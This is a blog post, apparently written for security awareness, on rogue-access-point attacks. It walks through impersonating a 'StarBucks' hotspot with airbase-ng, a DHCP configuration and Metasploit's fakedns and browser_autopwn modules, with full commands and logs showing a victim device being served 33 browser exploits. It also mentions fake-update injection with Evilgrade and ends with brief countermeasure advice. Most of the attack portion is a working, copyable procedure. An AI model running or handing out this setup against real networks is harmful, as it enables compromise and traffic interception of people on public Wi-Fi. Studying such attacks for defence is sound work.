Count Upon Security

Back in 2004, Dino Dai Zovi and Shane Macaulay developed a set of tools for assessing the security of wireless clients at multiple layers known as KARMA. This tool exploited the Windows XP and MacOS X operating systems capability of doing automatic wireless network discovery and known network identification to facilitate wireless networking for the end-user. Those operating systems facilitated the network identification by remembering past wireless networks that have been joined. Plus they will be automatically looking for these networks (referred to as Preferred or Trusted Networks) whenever the wireless network adapter is enabled [1].

Our Evil neighbor could than benefit of this vulnerability inherent in the way Windows XP and Mac OS X operating systems searched for networks. Essentially, Evil neighbor can sniff the wireless network and discover clients plus their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From this point onward  individual clients within wireless radio range of the attacker could be targeted [2]. Evil just needed to create an rogue AP for one of the probed networks and the clients will associate to the wireless network without user interaction. In addition to the rogue AP, the Evil neighbor will need to create a set of fake infrastructure services like DNS and DHCP to serve these clients. With this in place Evil has full control of the traffic, allowing him to launch devastating attacks. Among others, he can setup client side attacks, capture passwords, manipulate routing paths, setup phishing sites, have control over DNS, etc. In addition this set tools have been incorporated into Metasploit framework and named Karmetasploit which lead to further automation and impact.

Besides this attack vector, with the introduction of more recent operating systems such as Windows Vista and 7, this vulnerability was mitigated. However, with the explosion of mobile devices in public areas such as Airports, Hotels, Shopping centers, etc, there is a great opportunity for attackers. Bad guys can use similar techniques to Karma and impersonate Hot Spots. An Evil can simple create a rogue AP pretending to be one of those Hot Spot environment widely used and popular on these areas. Then he just needs to passively wait for people to connect to. How many times did you connect to an open wireless network in a Hotel or Airport or at StarBucks to send that new picture you just took or to send that important email to your boss?

Let’s illustrate how Evil can take advantage of this opportunistic attack by impersonating a popular Hot Spot such as StarBucks. When a victim associates to the rogue Hot Spot, it will be configured with DNS server that we control. In addition, we will leverage the usage of Metasploit Browser Autopwn module. This module creates a web server in our local machine which will contain different browser exploits. The user will be then redirected to this web server trough DNS. Then the execution of the exploits will start against the browser of the victim and if one of the exploits is successful a meterpreter session will open.

In this case Evil would be in a locations that is likely to be frequent by many people. By doing so he will have a better probability of someone to associate with his fake Hot Spot environment.  In this exercise I’m using BackTrack 5 linux distro but any other linux system can be used. For the sake of brevity the majority of commands output  have been removed.

On Backtrack 5, the DHCP server package needs to be installed.
#apt-get install dhcp3-server

Due to some dependencies, you may got the following error:
 dhcp3-server: Depends: dhcp3-common (= 3.1.3-2ubuntu3.2) but 3.1.3-2ubuntu3.3 is to be installed
E: Broken packages

To solve this, you need to remove existing dhcp3-common package and then run the dhcp3-server installation again.
#apt-get remove dhcp3-common
The following packages will be REMOVED:
 dhcp3-client dhcp3-common wicd wicd-daemon wicd-gtk
#apt-get install dhcp3-server
#apt-get install wicd

This was the only requisite in Backtrack 5 since all the other tools are already installed.
Evil needs to create a dhcpd.conf file with the lease settings. Then, he will need to put the wireless interface in monitor mode. Subsequently, he will be using  airbase-ng which is a multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself.

He goes into the dhcpd folder and create a dhcpd.conf file with the lease settings shown below.

# cd /etc/dhcp3/
# cp dhcpd.conf dhcpd.orig

# vi dhcpd.conf

 ddns-update-style none;
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
}

Now, he can start by putting the wireless network interface into monitor mode.

$ sudo airmon-ng start wlan0
Interface             Chipset                 Driver
wlan0                    Intel 4965AGN   iwl4965 – [phy0]
                                                                (monitor mode enabled on mon0)

Next step is to use  airbase-ng tool. With this command a tap interface named at0 will be created advertising the ESSID StarBucks on channel 9.

$ sudo airbase-ng -e “StarBucks” -c 9 mon0
15:55:03  Created tap interface at0
15:55:03  Trying to set MTU on at0 to 1500
15:55:03  Access Point with BSSID 00:1D:E0:04:AE:71 started.

Now he will leave this command shell running and open another shell to continue with the rest of the attack.

He will need to bring at0 interface up and assign a IP address and network mask
$ sudo ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

Then he can start the DHCP deamon. First by creating /var/run/dhcpd folder and then assigning the right ownership permisions. Second, start the dhcd3 deamon pointing to the correct configuration file that was created plus the pid file under the right folder.

sudo mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 -pf /var/run/dhcpd/dhcpd.pid at0

$ ps aux | grep dhcpd
dhcpd    12790  0.0  0.0   3864  1772 ?        Ss   15:44   0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 -pf /var/run/dhcpd/dhcpd.pid at0

With this settings, Evil as an Access Point and DHCP infrastructure in place. Every time a new client associates with the network StarBucks, it will get the settings from the DHCP lease wich include our fake DNS server address. Now he will use Metasploit framework to run fake DNS server.

The settings are straightforward. The TARGETACTION can be set to BYPASS, which can be useful for testing the settings. In addition the TARGETDOMAIN can be a specific website instead of (*).

$sudo msfconsole
msf > use auxiliary/server/fakedns
msf  auxiliary(fakedns) > set SRVHOST 10.0.0.1
msf  auxiliary(fakedns) > set TARGETACTION FAKE
msf  auxiliary(fakedns) > set TARGETHOST 10.0.0.1
msf  auxiliary(fakedns) > set TARGETDOMAIN *
msf  auxiliary(fakedns) > show options

msf  auxiliary(fakedns) > run
[*] Auxiliary module execution completed
[*] DNS server initializing
[*] DNS server started

When the victim associates to the StarBucks AP, gets DHCP lease and browses to a particular website he will be redirected via DNS to the host 10.0.0.1.
Now,  Evil will be using Metaploit browser autopwn module that automates client side exploits. First he set the global settings AUTOPWN_HOST, PORT and URI. These specify where the service resides and the URL that will be sent to the client victim. Next, the local options SRVPORT and URIPATH are specified. Finally the LHOST and LPORT tells the module where to direct the connect back shells. In the Metasploit version 4.5.0 the autopwn module is able to load 43 client side exploits to try against different browsers.

msf  auxiliary(fakedns) > use auxiliary/server/browser_autopwn
msf  auxiliary(browser_autopwn) > set AUTOPWN_HOST 10.0.0.1
msf  auxiliary(browser_autopwn) > set AUTOPWN_PORT 55550
msf  auxiliary(browser_autopwn) > set AUTOPWN_URI /ads
msf  auxiliary(browser_autopwn) > set SRVPORT 55550
msf  auxiliary(browser_autopwn) > set URIPATH /ads
msf  auxiliary(browser_autopwn) > set LHOST 10.0.0.1
msf  auxiliary(browser_autopwn) > set LPORT 45000
msf  auxiliary(browser_autopwn) > show options

msf  auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
msf  auxiliary(browser_autopwn) > [*] Obfuscating initial javascript 2012-12-15 09:09:23 -0500
[*] Done in 1.113271598 seconds
[*] Starting exploit modules on host 10.0.0.1…
 ( … )
[*] — Done, found 43 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*]  Local IP: http://127.0.0.1:55550/ads
[*] Server started. 

The AutoPwn server is listening on port 55550 and now he will use the Metasploit http capture module to redirect all arbitrary URLs on port 80 to the AutoPwn module.

msf  auxiliary(browser_autopwn) > use auxiliary/server/capture/http
msf  auxiliary(http) > show options

msf  auxiliary(http) > run
[*] Auxiliary module execution completed
msf  auxiliary(http) >
[*] Listening on 0.0.0.0:80…
[*] Server started.

Now when a user associates to the fake AP you should see the following on the Airbase-ng shell:
09:16:59  Client 04:54:33:7F:4F:AA associated (unencrypted) to ESSID: “StarBucks”
09:16:59  Client 04:54:33:7F:4F:AA associated (unencrypted) to ESSID: “StarBucks”

After that you should see a DHCP exchange between the victim and the DHCP server. You can look at /var/log/messages to see the discover, offer, request and ack transactions.

tail -f /var/log/messages
Dec 14 16:11:40 bt dhcpd: DHCPDISCOVER from 04:54:33:7f:4f:aa via at0
Dec 14 16:11:41 bt dhcpd: DHCPOFFER on 10.0.0.101 to 04:54:33:7f:4f:aa (iPad) via at0
Dec 14 16:11:42 bt dhcpd: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 04:54:33:7f:4f:aa (iPad) via at0
Dec 14 16:11:42 bt dhcpd: DHCPACK on 10.0.0.101 to 04:54:33:7f:4f:aa (iPad) via at0

Finally, when a user browses to a page, DNS server will redirect him to the fake DNS server. When browsing to port 80 the http capture module will interact with it and redirect it to the Autopwn module. The victim will be served with a page that is locate under msf3/data/exploits/capture/http/index.html plus an IFRAME pointing to the AutoPwn exploits.
The following output ilustrates what happen when the client is start to be redeirected by the Fake DNS module and then the AutoPwn kicks in. In this case the AutoPwn module managed to autodetect the client being used and then sent the apropriate exploits. In this case it detected the client as being a Windows 7 and based on this information it delivered 33 exploits.

[*] 10.0.0.101:63184 – DNS – DNS target domain found: *
[*] 10.0.0.101:63184 – DNS – DNS target domain http://www.linkedin.com faked
[*] 10.0.0.101:63184 – DNS – XID 32445 (IN::A http://www.linkedin.com)
[*] 10.0.0.101:55684 – DNS – DNS target domain found: *
[*] 10.0.0.101:55684 – DNS – DNS target domain http://www.monster.com faked
[*] 10.0.0.101:55684 – DNS – XID 37698 (IN::A http://www.monster.com)
[*] 10.0.0.101:63286 – DNS – DNS target domain found: *
[*] 10.0.0.101:63286 – DNS – DNS target domain http://www.yahoo.com faked
[*] 10.0.0.101:63286 – DNS – XID 56637 (IN::A http://www.yahoo.com)

[*] 10.0.0.103       browser_autopwn – Handling ‘/ads’
[*] 10.0.0.103       browser_autopwn – Handling ‘/ads?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6OC4wOg%3d%3d’
[*] 10.0.0.103       browser_autopwn – JavaScript Report: Microsoft Windows:7:undefined:en-us:x86:MSIE:8.0:
[*] 10.0.0.103       browser_autopwn – Reporting: {:os_name=>”Microsoft Windows”, : os_flavor=>”7″, : os_lang=>”en-us”, :arch=>”x86″}
[*] 10.0.0.103       browser_autopwn – Responding with 33 exploits

Eventually, this will lead to a compromissed system and potentially a shell opened on the Evil system with access to the victim system – I will leave that demonstration and ilustration for futher posts.

As you could see this is a powerfull attack but is also noisy and visible to the victim. An potential victim that is aware of such attacks can easily see that something is wrong when he tries to connect to the Hot Spot. He will be  unable to surf to any webpage and only to a custom suspicious page.

More targetted attacks are feasible and easily done. For example if Evil has two wireless cards on his computer he can easily create a fake Hot Spot environment and route all your traffic trough is computer. Then in a much more discrete and evasive way he can modify traffic content or impersonate services to deliver malicious contents or eavesdropping on sensitive content such as unprotected email. For example he can exploit the execution of automated software downloads. Java is an particular example because at regular intervals the Java updater will contact javadl.esd.sun.com over HTTP. Another example is Mcafee AV updater which will contact updatekeepalive.mcafee.com in order to check for the availability of new updates. Among others tools like Evilgrade which is a modular framework that allows the user to take advantage of poor update and upgrade implementations by injecting fake updates, can be used to accomplish this.

Next time you connect to a free Hot Spot environment within a metropolitan area consider that someone could be impersonating and/or eavesdropping it. Best will be never to connect to a open AP but that might be unrealistic. One simple countermeasure will be to configure static DNS entries which wont stop a determined attacker but potentially gives your more provability to not be a target.

References:
[1] Attacking Automatic Wireless Network Selection, Dino A. Dai Zovi, Shane A. Macaulay, 2005
[2] Hacking Exposed Wireless: Wireless Security Secrets & Solutions, Second Edition, Johnny Cache, Joshua Wright, Vincent Liu, 2010
Metasploit, David Kennedy, Jim O’Gorman, Devon Kearns, 2011